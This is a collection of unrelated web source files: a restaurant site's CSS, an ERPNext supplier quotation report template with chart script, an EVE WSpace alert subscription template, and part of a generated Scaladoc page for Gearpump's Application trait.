.venue__item {
width: 31.3%;
float: left;
margin-right: 3%;
}
}
.venue__item .title {
font-size: 22px;
font-size: 1.57143rem;
line-height: 1;
}
.venue__item > :first-child {
margin-top: 0;
}
@media only screen and (min-width: 569px) {
.venue__item--double {
width: 65.6%;
}
}
.venue-menus {
padding-right: 22px !important;
}
.venue-menus li {
margin-bottom: 11px;
text-align: center;
font-family: "museo_slab500", Verdana, sans-serif;
font-size: 12px;
font-size: 0.85714rem;
line-height: 1.83333;
}
.venue-menus a {
display: block;
background-color: #b3b3b3;
}
.venue-menus a:after {
content: ' >';
}
.venue-opening p:last-child {
margin-bottom: 0;
}
.venue-quote {
background: url("../images/venue-quote.png") 11px 44px no-repeat;
}
.venue-quote blockquote {
padding: 33px 22px;
}
.venue-contact {
color: #ff8400;
}
.venue-contact img {
margin-top: 22px;
}
.venue-contact .title {
font-size: 20px;
font-size: 1.42857rem;
line-height: 1.1;
margin-top: 0;
}
.venue-link {
overflow: hidden;
}
.venue-link a {
display: block;
position: relative;
text-align: center;
}
.venue-link h2 {
position: relative;
z-index: 1;
display: inline-block;
margin: 44px 0;
padding: 11px;
background: #222222;
background-color: rgba(34, 34, 34, 0.7);
color: white;
}
.venue-link img {
min-width: 100%;
position: absolute;
top: 0;
left: 0;
}
.venue-link--floorplan {
position: relative;
text-align: center;
}
.venue-link--floorplan > a:first-child {
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
z-index: 10;
}
.venue-link--floorplan h2 {
font-size: 22px;
font-size: 1.57143rem;
line-height: 1;
}
.venue-link--ad a {
text-align: left;
}
.venue-link--ad .title {
margin: 0 0 88px;
background-color: transparent;
text-shadow: 10px 10px 50px black;
}
/*------------------------------------*\
$LOCATION BOX
\*------------------------------------*/
.location-box {
padding: 44px 0;
margin-bottom: 0;
border-bottom: 2px dotted #b3b3b3;
}
.location-box:last-child {
border-bottom: none;
padding-bottom: 0;
}
.location-box__image {
height: 198px;
width: 198px;
overflow: hidden;
float: none;
margin: 0 auto 44px;
}
@media only screen and (max-width: 568px) {
.location-box__image {
display: block;
margin-bottom: 22px;
}
}
@media only screen and (min-width: 569px) {
.location-box__image {
float: left;
margin-right: 33px;
margin-bottom: 0;
}
}
.location-box__image img {
border-radius: 198px;
min-height: 100%;
min-width: 100%;
}
.location-box__title {
margin: 0;
font-family: "museo_slab500", Verdana, sans-serif;
font-size: 16px;
font-size: 1.14286rem;
line-height: 1.375;
}
@media only screen and (min-width: 1200px) {
.location-box__left,
.location-box__right {
display: inline-block;
width: 48%;
padding-right: 22px;
vertical-align: top;
}
}
.location-box__right {
padding-right: 66px;
}
.foot-note {
padding: 11px 0;
border-top: 2px dotted #b3b3b3;
border-bottom: 2px dotted #b3b3b3;
margin-bottom: 0;
}
/*------------------------------------*\
$BOOKING WIDGET
\*------------------------------------*/
.booking-widget {
width: 360px;
height: 242px;
padding: 91px 35px 34px 24px;
font-size: 14px !important;
color: #222222 !important;
background: url("../images/booking-widget.png") no-repeat;
}
@media only screen and (max-width: 360px) {
.booking-widget {
position: relative;
left: -33px;
}
}
@media only screen and (max-width: 568px) {
.booking-widget {
margin: 22px auto 0;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.booking-widget {
margin: 0 auto 22px;
}
}
@media only screen and (min-width: 569px) and (max-width: 1023px) {
.page--bills-bar-burger .main .booking-widget,
.page--bills-bar-burger #footer_nav .booking-widget {
margin-top: 55px;
}
}
@media only screen and (max-width: 568px) {
.page--bills-bar-burger .main .booking-widget,
.page--bills-bar-burger #footer_nav .booking-widget,
.page--gallery .booking-widget {
display: none;
}
}
@media only screen and (min-width: 569px) {
.page--bills-bar-burger .main .booking-widget,
.page--bills-bar-burger #footer_nav .booking-widget,
.page--gallery .booking-widget {
margin-left: 0;
}
}
@media only screen and (min-width: 1024px) {
.page--bills-bar-burger .main .booking-widget,
.page--bills-bar-burger #footer_nav .booking-widget,
.page--gallery .booking-widget {
left: auto;
position: fixed;
top: 24px;
right: 24px;
}
}
.page--hours-and-locations .booking-widget,
.page--book-here .booking-widget,
.venue-page .booking-widget {
background: url("../images/booking-widget-dark.png") no-repeat;
}
.page--hours-and-locations .booking-widget {
margin: 22px auto 0;
}
@media only screen and (min-width: 1024px) {
.page--hours-and-locations .booking-widget {
width: 726px;
height: auto;
padding: 23px 0 20px 20px;
background: url("../images/booking-widget-vertical.png") top left no-repeat;
}
.page--hours-and-locations .booking-widget .rowElem,
.page--hours-and-locations .booking-widget .submit {
width: 23%;
}
.page--hours-and-locations .booking-widget .submit {
width: auto;
}
.page--hours-and-locations .booking-widget .submit .icon {
float: none;
}
}
.booking-widget .rowElem,
.booking-widget .submit {
display: block;
margin: 0 11px 11px 0;
width: 45%;
float: left;
clear: none !important;
}
.booking-widget .rowElem {
position: relative;
}
.booking-widget .rowElem .jqTransformInputInner div {
margin: 0;
}
.booking-widget .rowElem .icon {
position: absolute;
z-index: 100;
font-size: 18px;
top: 20%;
right: 8%;
color: #222222;
}
.booking-widget .submit .button,
.booking-widget .submit .venue-menus a,
.venue-menus .booking-widget .submit a {
display: block;
padding-top: 0;
padding-bottom: 0;
line-height: 34px;
}
.booking-widget .submit .icon {
font-size: 12px;
float: right;
}
.booking-widget .startdate,
.booking-widget .resttime {
height: 35px;
background: #fff;
border: 1px solid #dfdfdf;
}
.booking-widget .startdate input,
.booking-widget .resttime input {
text-indent: 12px;
outline: none;
}
@media only screen and (max-width: 720px) {
.page--book-here .media__img--rev,
.page--bills-bar-burger-rockefeller-center .media__img--rev,
.page--bills-bar-burger-meatpacking-district .media__img--rev,
.page--bills-bar-and-burger-atlantic-city .media__img--rev {
float: none;
margin-left: 0;
}
}
/*------------------------------------*\
$BOOK BUTTON
\*------------------------------------*/
.book-circle {
font-size: 22px;
font-size: 1.57143rem;
line-height: 1;
display: table;
width: 154px;
height: 154px;
border-radius: 100%;
background: #ee3124;
color: white;
text-align: center;
}
@media only screen and (max-width: 1023px) {
/* 1commentsdif sdf */
.book-circle {
display: none; /* another comment */
}
}
.main__content .book-circle {
position: absolute;
top: -176px;
right: 22px;
}
.page--gallery .book-circle {
position: absolute;
top: 44px;
right: 44px;
display: none;
}
@media only screen and (min-width: 1024px) {
.page--gallery .book-circle.is-visible {
display: table;
}
}
.book-circle__inner {
display: table-cell;
vertical-align: middle;
}
.book-circle__inner .icon {
display: block;
margin: 0 auto 11px;
}
/*------------------------------------*\
$LEAD
\*------------------------------------*/
.lead {
font-size: 16px;
font-size: 1.14286rem;
line-height: 1.375;
}
.venue-lead {
padding-bottom: 33px;
margin-bottom: 33px;
background: url("../images/hr-2.png") repeat-x bottom;
line-height: 33px;
font-size: 20px;
font-size: 1.42857rem;
}
/*------------------------------------*\
$PAGE BACKGROUNDS
\*------------------------------------*/
/**
* Maybe create a mixin for this? Something like:
*
@mixin background-cover($url, $attachment:false){
background: url('$url');
background-size: cover;
filter: progid:DXImageTransform.Microsoft.AlphaImageLoader( src='$url', sizingMethod='scale');
-ms-filter: "progid:DXImageTransform.Microsoft.AlphaImageLoader( src='$url', sizingMethod='scale')";
@if $attachment == fixed{
background-attachment: $attachment;
}
}
@include background-cover('../images/gallery/meatpacking/large/image2.jpg', fixed); // optional 'background-attachment: fixed'?
*
*/
.page--hours-and-locations,
.page--menus-and-food,
.page--bills-bar-burger-rockefeller-center,
.page--bills-bar-burger-meatpacking-district,
.page--bills-bar-burger-atlantic-city,
.page--bills-bar-burger-downtown {
background: url("../images/backgrounds/menus-and-food.jpg");
background-attachment: fixed;
background-size: cover;
}
.page--special-events {
background: url("../images/backgrounds/special-events.jpg");
background-attachment: fixed;
background-size: cover;
}
.page--about-bills,
.page--whats-happening {
background: url("../images/backgrounds/news.jpg");
background-attachment: fixed;
background-size: cover;
}
.page--book-here {
background: url("../images/backgrounds/book-here.jpg");
background-attachment: fixed;
background-size: cover;
}
/*------------------------------------*\
$JQUERY UI
\*------------------------------------*/
/**
* Jquery UI widgets are not build with the new box-model, so we need to reset it just for Jquery UI
*/
.ui-widget * {
-moz-box-sizing: content-box !important;
box-sizing: content-box !important;
}
/*------------------------------------*\
$JQTRANSFORM
\*------------------------------------*/
/**
* The CSS below is used to style form elements through a Jquery plugin called Jqtransform.
* See _jqtransform.scss in the vendor folder.
*/
.jqTransformSelectWrapper {
width: 100% !important;
}
.jqTransformSelectWrapper div span {
display: block !important;
width: 135px;
color: #222222 !important;
text-transform: none;
}
#opentableRezervtionForm .jqTransformSelectWrapper {
color: #222222;
}
#opentableRezervtionForm .jqTransformSelectWrapper a.jqTransformSelectOpen,
#navSelect .jqTransformSelectWrapper a.jqTransformSelectOpen {
z-index: 999px;
font-size: 18px;
width: auto;
height: auto;
top: 12%;
right: 7%;
color: #222222;
}
.jqTransformSelectWrapper a.jqTransformSelectOpen::after {
font-family: 'bills';
speak: none;
font-style: normal;
font-weight: normal;
font-variant: normal;
text-transform: none;
-webkit-font-smoothing: antialiased;
content: "\e009";
}
.jqTransformSelectWrapper ul {
position: relative;
top: 100%;
overflow: auto;
margin: 0;
padding: 0;
width: 100% !important;
height: 140px;
border-right: 1px solid #CCC;
border-bottom: 1px solid #CCC;
border-left: 1px solid #CCC;
background-color: #FFF;
list-style-type: none;
text-align: left;
position: absolute;
}
.jqTransformSelectWrapper ul a.selected {
background: #fff;
}
.jqTransformSelectWrapper ul a:hover {
background: #e4e0e0;
}
.divElem {
position: relative;
}
#show_datepicker,
#show_timepicker {
position: absolute;
top: 4px;
right: 9px;
}
#show_datepicker:hover,
#show_timepicker:hover {
cursor: pointer;
}
#ui-timepicker-div {
position: relative;
margin-top: 35px;
}
.jqTransformInputInner div input {
width: 100% !important;
line-height: 22px !important;
position: relative !important;
z-index: 100 !important;
border-radius: 0 !important;
}
#map_canvas,
#map_canvas_loc {
height: 400px;
}
#map_tabs {
display: none;
/* I could not disable this in the snippet so I had to hide it like this */
}
#map_accordion {
margin-top: -25px;
}
#map_accordion ul {
padding: 11px 0;
margin: 0 0 22px;
list-style: none;
background: url("../images/hr-2.png") bottom repeat-x;
}
#map_accordion li {
margin: 0 11px !important;
}
#map_accordion li a {
color: #222222;
}
.map_print {
display: none;
}
/*------------------------------------*\
$VENUE BOX (OLD)
\*------------------------------------*/
/**
* All of the'.venue_'... CSS is copied from the old website
* and is used to style the popup boxes in the google maps widget
*/
.venue_box {
width: 272px;
display: inline;
float: left;
margin: 0 17px;
color: #000;
height: 220px !important;
/* I had to add a hight with !important to keep it from breaking */
}
.venue_wrap {
width: 252px;
text-align: center;
background: #fff;
font: 0.8em Arial, Helvetica, sans-serif;
padding: 10px;
}
.venue_image {
height: 115px;
width: 252px;
overflow: hidden;
}
.venue_image img {
height: 115px;
}
.venue_text {
border-bottom: 1px solid #000;
padding: 5px;
overflow: hidden;
}
.venue_info {
height: 50px;
margin-top: 3px;
}
.venue_mealtime {
display: block;
clear: both;
}
.venue_contact {
margin-top: 5px;
}
.venue_contact a {
color: #000;
text-decoration: none;
margin-left: 5px;
}
.venue_contact a:hover {
color: #000;
text-decoration: underline;
}
.venue_cost {
display: none;
margin: 2px auto;
width: 68px;
}
.venue_cuisine {
display: none;
}
.venue_address {
clear: both;
}
.venue_actions {
background: #ff0066;
padding: 2px 0;
}
.venue_actions a {
color: #fff;
margin-left: 8px;
text-decoration: none;
}
.venue_actions a:hover {
text-decoration: underline;
color: #fff;
}
.venue_social {
margin: 15px 0 10px 0;
}
.venue_social a {
margin-right: 10px;
}
@media only screen {
/* hihihih */
html{
color:red; /* hsdfjsdjhf */
line-height: 200;
}
}
@media print {
html{
color:red;
line-height: 200;
}
}
@-webkit-keyframes NAME-YOUR-ANIMATION {
/* hahahah */
0% { opacity: 0; /* helphelp */ }
100% { opacity: 1; }
}
@-moz-keyframes NAME-YOUR-ANIMATION {
0% { opacity: 0; }
100% { opacity: 1; }
}
@-o-keyframes NAME-YOUR-ANIMATION {
0% { opacity: 0; }
100% { opacity: 1; }
}
@keyframes NAME-YOUR-ANIMATION {
0% { opacity: 0; }
100% { opacity: 1; }
}
|
erpnext/buying/report/supplier_quotation_comparison/supplier_quotation_comparison.html
|
saurabh6790/erpnext
|
<head>
<link href="/assets/frappe/css/c3.min.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/assets/frappe/js/lib/d3.min.js"></script>
<script type="text/javascript" src="/assets/frappe/js/lib/c3.min.js"></script>
<script type="text/javascript">
onReady("#chart_div", function() {
var chartData = [];
{% var q = 0; %}
{% for(var j=0, m=data.length+1; j<m; j++) { %}
var tempData{%=j%} = [];
{% for(var i=1, l=report.columns.length; i<l; i++) { %}
{% if(__(report.columns[i].label) != __("Quotation")) { %}
{% if(j == 0) { %}
{% if(i == 1) { %}
tempData{%=j%}[{%=i%}-1] = \"x\";
{% } else { %}
tempData{%=j%}[{%=i%}-1] = Math.log(parseInt(\"{%= report.columns[i].label %}\".replace(\"Qty: \",\"\"))) / Math.LN10;
{% } %}
{% } else { %}
{% if(i == 1) { %}
tempData{%=j%}[{%=i%}-1] = \"{%= data[j-1][report.columns[i].fieldname] %} \";
{% } else { %}
tempData{%=j%}[{%=i%}-1] = {% if(data[j-1][report.columns[i].fieldname] == "") { if (i > 2) { %}
tempData{%=j%}[{%=i%}-2]
{% } else { %}
0
{% } } else { %}
{%= data[j-1][report.columns[i].fieldname] %}
{% } %};
{% } %};
{% } %}
{% } else { %}
{% if(j == 0) { %}
{% if(i < l-1) { %}
tempData{%=j%}[{%=i%}-1] = Math.log(parseInt(\"{%= report.columns[i+1].label %}\".replace(\"Qty: \",\"\"))-1) / Math.LN10;
{% } else { %}
tempData{%=j%}[{%=i%}-1] = Math.log(2*parseInt(\"{%= report.columns[i-1].label %}\".replace(\"Qty: \",\"\"))) / Math.LN10;
{% } %}
{% } else { %}
tempData{%=j%}[{%=i%}-1] = tempData{%=j%}[{%=i%}-2];
{% } %}
{% } %}
{% } %}
chartData[{%=j%}] = tempData{%=j%};
{% } %}
console.log(chartData);
hold = {
bindto: "#chart_div" ,data: {
x: "x",
columns: chartData
},
axis: {
x: {
tick: {
format: function (x22) { return Math.pow(10,x22).toFixed(0); },
culling: {
max: {%=report.columns.length%} / 2
}
}
}
},
point: {
show: false
}
};
console.log(hold);
var chart = c3.generate(hold);
});
function onReady(selector, callback) {
var intervalID = window.setInterval(function() {
if (document.querySelector(selector) !== undefined) {
window.clearInterval(intervalID);
callback.call(this);
}
}, 500);}
</script>
</head>
<div style="margin-bottom: 7px;" class="text-center">
{%= frappe.boot.letter_heads[frappe.defaults.get_default("letter_head")] %}
</div>
<h2 class="text-center">{%= __(report.report_name) %}</h2>
<h4 class="text-center">{%= filters.item %} </h4>
<hr>
<table class="table table-bordered">
<thead>
<tr>
{% for(var i=0, l=report.columns.length; i<l; i++) { %}
<th style="width: 15%">{%= report.columns[i].label %}</th>
{% } %}
</tr>
</thead>
<tbody>
{% for(var i=0, l=data.length; i<l; i++) { %}
<tr>
{% for(var j=0,m=report.columns.length; j<m; j++) { %}
<td style="width: 15%">{%= data[i][report.columns[j].fieldname] %}</td>
{% } %}
</tr>
{% } %}
</tbody>
</table>
<h4 class="text-center"> Analysis Chart </h4>
<div id="chart_div"></div>
<p class="text-right text-muted">Printed On {%= frappe.datetime.str_to_user(frappe.datetime.get_datetime_as_string()) %}</p>
|
evewspace/Alerts/templates/edit_subscriptions.html
|
SaintDrage/eve-wspace
|
{% load alert_tags %}
<div id="editSubscriptionsDialog">
<div class="modal-header">
<h4>Edit Subscriptions</h4>
</div>
<div class="modal-body">
<h6>What pings would you like to get and where should they go?</h6>
<form id="editAlertSubsForm" action="/alerts/subscriptions/" method="POST">
<table class="table">
<tr>
<th>Group</th>
{% for method in all_methods %}
<th>{{method}}</th>
{% endfor %}
</tr>
{% for group in available_groups %}
<tr>
<td>{{group.name}}</td>
{% for method in all_methods %}
<td><input name="{{group.pk}}_{{method}}" type="checkbox" {% if method in current_subs|keyvalue:group.name %} checked="checked" {% endif %} /></td>
{% endfor %}
</tr>
{% empty %}
<tr>
<td>You are not eligible for any alert groups!</td>
</tr>
{% endfor %}
</table>
</form>
</div>
<div class="modal-footer">
<button class="btn" onclick="$('#modalHolder').modal('hide').empty();">Cancel</button>
<button class="btn btn-primary" onclick="EditAlertSubscriptions();">Save</button>
</div>
<script type="text/javacript">
$('#editAlertSubsForm').submit(function(e){
e.preventDefault();
return false;
});
</script>
</div>
|
releases/0.7.6/api/scala/io/gearpump/cluster/Application.html
|
gearpump/gearpump.github.io
|
<!DOCTYPE html >
<html>
<head>
<title>Application - io.gearpump.cluster.Application</title>
<meta name="description" content="Application - io.gearpump.cluster.Application" />
<meta name="keywords" content="Application io.gearpump.cluster.Application" />
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link href="../../../lib/template.css" media="screen" type="text/css" rel="stylesheet" />
<link href="../../../lib/diagrams.css" media="screen" type="text/css" rel="stylesheet" id="diagrams-css" />
<script type="text/javascript" src="../../../lib/jquery.js" id="jquery-js"></script>
<script type="text/javascript" src="../../../lib/jquery-ui.js"></script>
<script type="text/javascript" src="../../../lib/template.js"></script>
<script type="text/javascript" src="../../../lib/tools.tooltip.js"></script>
<script type="text/javascript">
if(top === self) {
var url = '../../../index.html';
var hash = 'io.gearpump.cluster.Application';
var anchor = window.location.hash;
var anchor_opt = '';
if (anchor.length >= 1)
anchor_opt = '@' + anchor.substring(1);
window.location.href = url + '#' + hash + anchor_opt;
}
</script>
</head>
<body class="type">
<div id="definition">
<a href="Application$.html" title="Go to companion"><img src="../../../lib/trait_to_object_big.png" /></a>
<p id="owner"><a href="../../package.html" class="extype" name="io">io</a>.<a href="../package.html" class="extype" name="io.gearpump">gearpump</a>.<a href="package.html" class="extype" name="io.gearpump.cluster">cluster</a></p>
<h1><a href="Application$.html" title="Go to companion">Application</a></h1><h3><span class="morelinks"><div>
Related Docs:
<a href="Application$.html" title="See companion">object Application</a>
| <a href="package.html" class="extype" name="io.gearpump.cluster">package cluster</a>
</div></span></h3><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
</div>
<h4 id="signature" class="signature">
<span class="modifier_kind">
<span class="modifier"></span>
<span class="kind">trait</span>
</span>
<span class="symbol">
<span class="name">Application</span><span class="result"> extends <span class="extype" name="scala.AnyRef">AnyRef</span></span>
</span>
</h4>
<div id="comment" class="fullcommenttop"><div class="toggleContainer block">
<span class="toggle">Linear Supertypes</span>
<div class="superTypes hiddenContent"><span class="extype" name="scala.AnyRef">AnyRef</span>, <span class="extype" name="scala.Any">Any</span></div>
</div><div class="toggleContainer block">
<span class="toggle">Known Subclasses</span>
<div class="subClasses hiddenContent"><a href="Application$$DefaultApplication.html" class="extype" name="io.gearpump.cluster.Application.DefaultApplication">DefaultApplication</a>, <a href="../streaming/javaapi/StreamApplication.html" class="extype" name="io.gearpump.streaming.javaapi.StreamApplication">StreamApplication</a>, <a href="../streaming/StreamApplication.html" class="extype" name="io.gearpump.streaming.StreamApplication">StreamApplication</a></div>
</div></div>
<div id="mbrsel">
<div id="textfilter"><span class="pre"></span><span class="input"><input id="mbrsel-input" type="text" accesskey="/" /></span><span class="post"></span></div>
<div id="order">
<span class="filtertype">Ordering</span>
<ol>
<li class="alpha in"><span>Alphabetic</span></li>
<li class="inherit out"><span>By inheritance</span></li>
</ol>
</div>
<div id="ancestors">
<span class="filtertype">Inherited<br />
</span>
<ol id="linearization">
<li class="in" name="io.gearpump.cluster.Application"><span>Application</span></li><li class="in" name="scala.AnyRef"><span>AnyRef</span></li><li class="in" name="scala.Any"><span>Any</span></li>
</ol>
</div><div id="ancestors">
<span class="filtertype"></span>
<ol>
<li class="hideall out"><span>Hide All</span></li>
<li class="showall in"><span>Show all</span></li>
</ol>
<a href="http://docs.scala-lang.org/overviews/scaladoc/usage.html#members" target="_blank">Learn more about member selection</a>
</div>
<div id="visbl">
<span class="filtertype">Visibility</span>
<ol><li class="public in"><span>Public</span></li><li class="all out"><span>All</span></li></ol>
</div>
</div>
<div id="template">
<div id="allMembers">
<div id="values" class="values members">
<h3>Abstract Value Members</h3>
<ol><li name="io.gearpump.cluster.Application#appMaster" visbl="pub" data-isabs="true" fullComment="no" group="Ungrouped">
<a id="appMaster:Class[_<:io.gearpump.cluster.ApplicationMaster]"></a>
<a id="appMaster:Class[_<:ApplicationMaster]"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">abstract </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">appMaster</span><span class="result">: <span class="extype" name="scala.Predef.Class">Class</span>[_ <: <a href="ApplicationMaster.html" class="extype" name="io.gearpump.cluster.ApplicationMaster">ApplicationMaster</a>]</span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@appMaster:Class[_<:io.gearpump.cluster.ApplicationMaster]" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
</li><li name="io.gearpump.cluster.Application#name" visbl="pub" data-isabs="true" fullComment="no" group="Ungrouped">
<a id="name:String"></a>
<a id="name:String"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">abstract </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">name</span><span class="result">: <span class="extype" name="scala.Predef.String">String</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@name:String" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
</li><li name="io.gearpump.cluster.Application#userConfig" visbl="pub" data-isabs="true" fullComment="no" group="Ungrouped">
<a id="userConfig(implicitsystem:akka.actor.ActorSystem):io.gearpump.cluster.UserConfig"></a>
<a id="userConfig(ActorSystem):UserConfig"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">abstract </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">userConfig</span><span class="params">(<span class="implicit">implicit </span><span name="system">system: <span class="extype" name="akka.actor.ActorSystem">ActorSystem</span></span>)</span><span class="result">: <a href="UserConfig.html" class="extype" name="io.gearpump.cluster.UserConfig">UserConfig</a></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@userConfig(implicitsystem:akka.actor.ActorSystem):io.gearpump.cluster.UserConfig" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
</li></ol>
</div>
<div id="values" class="values members">
<h3>Concrete Value Members</h3>
<ol><li name="scala.AnyRef#!=" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="!=(x$1:Any):Boolean"></a>
<a id="!=(Any):Boolean"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span title="gt4s: $bang$eq" class="name">!=</span><span class="params">(<span name="arg0">arg0: <span class="extype" name="scala.Any">Any</span></span>)</span><span class="result">: <span class="extype" name="scala.Boolean">Boolean</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@!=(x$1:Any):Boolean" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div>
</li><li name="scala.AnyRef###" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="##():Int"></a>
<a id="##():Int"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span title="gt4s: $hash$hash" class="name">##</span><span class="params">()</span><span class="result">: <span class="extype" name="scala.Int">Int</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@##():Int" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div>
</li><li name="scala.AnyRef#==" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="==(x$1:Any):Boolean"></a>
<a id="==(Any):Boolean"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span title="gt4s: $eq$eq" class="name">==</span><span class="params">(<span name="arg0">arg0: <span class="extype" name="scala.Any">Any</span></span>)</span><span class="result">: <span class="extype" name="scala.Boolean">Boolean</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@==(x$1:Any):Boolean" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div>
</li><li name="scala.Any#asInstanceOf" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="asInstanceOf[T0]:T0"></a>
<a id="asInstanceOf[T0]:T0"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">asInstanceOf</span><span class="tparams">[<span name="T0">T0</span>]</span><span class="result">: <span class="extype" name="scala.Any.asInstanceOf.T0">T0</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@asInstanceOf[T0]:T0" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>Any</dd></dl></div>
</li><li name="scala.AnyRef#clone" visbl="prt" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="clone():Object"></a>
<a id="clone():AnyRef"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier"></span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">clone</span><span class="params">()</span><span class="result">: <span class="extype" name="scala.AnyRef">AnyRef</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@clone():Object" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>protected[<a href="../../../java$lang.html" class="extype" name="java.lang">java.lang</a>] </dd><dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd>
<span class="name">@throws</span><span class="args">(<span>
<span class="defval" name="classOf[java.lang.CloneNotSupportedException]">...</span>
</span>)</span>
</dd></dl></div>
</li><li name="scala.AnyRef#eq" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="eq(x$1:AnyRef):Boolean"></a>
<a id="eq(AnyRef):Boolean"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">eq</span><span class="params">(<span name="arg0">arg0: <span class="extype" name="scala.AnyRef">AnyRef</span></span>)</span><span class="result">: <span class="extype" name="scala.Boolean">Boolean</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@eq(x$1:AnyRef):Boolean" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef</dd></dl></div>
</li><li name="scala.AnyRef#equals" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="equals(x$1:Any):Boolean"></a>
<a id="equals(Any):Boolean"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier"></span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">equals</span><span class="params">(<span name="arg0">arg0: <span class="extype" name="scala.Any">Any</span></span>)</span><span class="result">: <span class="extype" name="scala.Boolean">Boolean</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@equals(x$1:Any):Boolean" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div>
</li><li name="scala.AnyRef#finalize" visbl="prt" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="finalize():Unit"></a>
<a id="finalize():Unit"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier"></span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">finalize</span><span class="params">()</span><span class="result">: <span class="extype" name="scala.Unit">Unit</span></span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@finalize():Unit" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Attributes</dt><dd>protected[<a href="../../../java$lang.html" class="extype" name="java.lang">java.lang</a>] </dd><dt>Definition Classes</dt><dd>AnyRef</dd><dt>Annotations</dt><dd>
<span class="name">@throws</span><span class="args">(<span>
<span class="symbol">classOf[java.lang.Throwable]</span>
</span>)</span>
</dd></dl></div>
</li><li name="scala.AnyRef#getClass" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="getClass():Class[_]"></a>
<a id="getClass():Class[_]"></a>
<h4 class="signature">
<span class="modifier_kind">
<span class="modifier">final </span>
<span class="kind">def</span>
</span>
<span class="symbol">
<span class="name">getClass</span><span class="params">()</span><span class="result">: <span class="extype" name="java.lang.Class">Class</span>[_]</span>
</span>
</h4><span class="permalink">
<a href="../../../index.html#io.gearpump.cluster.Application@getClass():Class[_]" title="Permalink" target="_top">
<img src="../../../lib/permalink.png" />
</a>
</span>
<div class="fullcomment"><dl class="attributes block"> <dt>Definition Classes</dt><dd>AnyRef → Any</dd></dl></div>
</li><li name="scala.AnyRef#hashCode" visbl="pub" data-isabs="false" fullComment="yes" group="Ungrouped">
<a id="hashCode():Int"></a>
